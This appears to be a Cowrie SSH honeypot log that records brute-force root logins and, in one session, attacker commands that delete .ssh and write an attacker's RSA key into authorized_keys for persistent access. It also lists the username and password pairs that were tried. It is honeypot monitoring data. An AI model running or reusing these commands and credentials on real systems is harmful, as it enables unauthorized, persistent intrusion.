{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:18:56.922921Z","src_ip":"212.227.235.229","session":"ea02d0c15bf0"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:18:57.503194Z","src_ip":"212.227.235.229","session":"ea02d0c15bf0"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:18:57.636108Z","src_ip":"212.227.235.229","session":"b5d620283509"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:18:57.637182Z","src_ip":"212.227.235.229","session":"ea02d0c15bf0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34236,"dst_ip":"1.2.3.4","dst_port":22,"session":"0cf10bc50bb7","protocol":"ssh","message":"New connection: 212.227.235.229:34236 (1.2.3.4:22) [session: 0cf10bc50bb7]","sensor":"my-vps","timestamp":"2025-09-08T23:19:32.771960Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:19:32.774646Z","src_ip":"212.227.235.229","session":"0cf10bc50bb7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:19:32.874385Z","src_ip":"212.227.235.229","session":"0cf10bc50bb7"}
{"eventid":"cowrie.login.failed","username":"test","password":"0000","message":"login attempt [test/0000] failed","sensor":"my-vps","timestamp":"2025-09-08T23:19:33.278469Z","src_ip":"212.227.235.229","session":"0cf10bc50bb7"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:19:34.381648Z","src_ip":"212.227.235.229","session":"0cf10bc50bb7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49946,"dst_ip":"1.2.3.4","dst_port":22,"session":"3281d824ca2c","protocol":"ssh","message":"New connection: 212.227.235.229:49946 (1.2.3.4:22) [session: 3281d824ca2c]","sensor":"my-vps","timestamp":"2025-09-08T23:19:46.519999Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:19:46.529285Z","src_ip":"212.227.235.229","session":"3281d824ca2c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:19:46.829106Z","src_ip":"212.227.235.229","session":"3281d824ca2c"}
{"eventid":"cowrie.login.success","username":"root","password":"daryaserver1234","message":"login attempt [root/daryaserver1234] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:19:48.032486Z","src_ip":"212.227.235.229","session":"3281d824ca2c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:19:48.683261Z","src_ip":"212.227.235.229","session":"3281d824ca2c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:19:48.684066Z","src_ip":"212.227.235.229","session":"3281d824ca2c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:19:48.684911Z","src_ip":"212.227.235.229","session":"3281d824ca2c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:19:48.987148Z","src_ip":"212.227.235.229","session":"3281d824ca2c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:19:49.709749Z","src_ip":"212.227.235.229","session":"3281d824ca2c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:19:49.710446Z","src_ip":"212.227.235.229","session":"3281d824ca2c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:19:50.013535Z","src_ip":"212.227.235.229","session":"3281d824ca2c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:19:50.014534Z","src_ip":"212.227.235.229","session":"3281d824ca2c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49952,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb1c14f45eb9","protocol":"ssh","message":"New connection: 212.227.235.229:49952 (1.2.3.4:22) [session: bb1c14f45eb9]","sensor":"my-vps","timestamp":"2025-09-08T23:19:50.331481Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:19:50.332283Z","src_ip":"212.227.235.229","session":"bb1c14f45eb9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:19:50.651319Z","src_ip":"212.227.235.229","session":"bb1c14f45eb9"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:19:52.154081Z","src_ip":"212.227.235.229","session":"bb1c14f45eb9"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:19:53.476501Z","src_ip":"212.227.235.229","session":"bb1c14f45eb9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49968,"dst_ip":"1.2.3.4","dst_port":22,"session":"1110906d7cb9","protocol":"ssh","message":"New connection: 212.227.235.229:49968 (1.2.3.4:22) [session: 1110906d7cb9]","sensor":"my-vps","timestamp":"2025-09-08T23:19:53.780003Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:19:53.780899Z","src_ip":"212.227.235.229","session":"1110906d7cb9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:19:54.081748Z","src_ip":"212.227.235.229","session":"1110906d7cb9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:19:55.632122Z","src_ip":"212.227.235.229","session":"1110906d7cb9"}
{"eventid":"cowrie.session.closed","duration":"9.4","message":"Connection lost after 9.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:19:55.935704Z","src_ip":"212.227.235.229","session":"3281d824ca2c"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:19:55.937043Z","src_ip":"212.227.235.229","session":"1110906d7cb9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38012,"dst_ip":"1.2.3.4","dst_port":22,"session":"34cc5292da1f","protocol":"ssh","message":"New connection: 212.227.235.229:38012 (1.2.3.4:22) [session: 34cc5292da1f]","sensor":"my-vps","timestamp":"2025-09-08T23:20:03.283190Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:20:03.284316Z","src_ip":"212.227.235.229","session":"34cc5292da1f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:20:03.425915Z","src_ip":"212.227.235.229","session":"34cc5292da1f"}
{"eventid":"cowrie.login.failed","username":"test2","password":"qwerty","message":"login attempt [test2/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-08T23:20:04.010102Z","src_ip":"212.227.235.229","session":"34cc5292da1f"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:20:05.151220Z","src_ip":"212.227.235.229","session":"34cc5292da1f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38578,"dst_ip":"1.2.3.4","dst_port":22,"session":"0caae6db92c7","protocol":"ssh","message":"New connection: 212.227.235.229:38578 (1.2.3.4:22) [session: 0caae6db92c7]","sensor":"my-vps","timestamp":"2025-09-08T23:20:32.448953Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:20:32.452581Z","src_ip":"212.227.235.229","session":"0caae6db92c7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:20:32.552067Z","src_ip":"212.227.235.229","session":"0caae6db92c7"}
{"eventid":"cowrie.login.failed","username":"superman","password":"superman@2025","message":"login attempt [superman/superman@2025] failed","sensor":"my-vps","timestamp":"2025-09-08T23:20:32.952780Z","src_ip":"212.227.235.229","session":"0caae6db92c7"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:20:34.058291Z","src_ip":"212.227.235.229","session":"0caae6db92c7"}
{"eventid":"cowrie.session.connect","src_ip":"8.130.138.92","src_port":33922,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd82dc502abe","protocol":"ssh","message":"New connection: 8.130.138.92:33922 (1.2.3.4:22) [session: bd82dc502abe]","sensor":"my-vps","timestamp":"2025-09-08T23:21:02.731457Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T23:21:02.732423Z","src_ip":"8.130.138.92","session":"bd82dc502abe"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-08T23:21:02.938139Z","src_ip":"8.130.138.92","session":"bd82dc502abe"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:21:10.733042Z","src_ip":"8.130.138.92","session":"bd82dc502abe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59452,"dst_ip":"1.2.3.4","dst_port":22,"session":"57276ef9a654","protocol":"ssh","message":"New connection: 212.227.235.229:59452 (1.2.3.4:22) [session: 57276ef9a654]","sensor":"my-vps","timestamp":"2025-09-08T23:21:14.331399Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:21:14.332410Z","src_ip":"212.227.235.229","session":"57276ef9a654"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:21:14.634062Z","src_ip":"212.227.235.229","session":"57276ef9a654"}
{"eventid":"cowrie.login.success","username":"root","password":"Logmein305","message":"login attempt [root/Logmein305] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:21:16.248067Z","src_ip":"212.227.235.229","session":"57276ef9a654"}
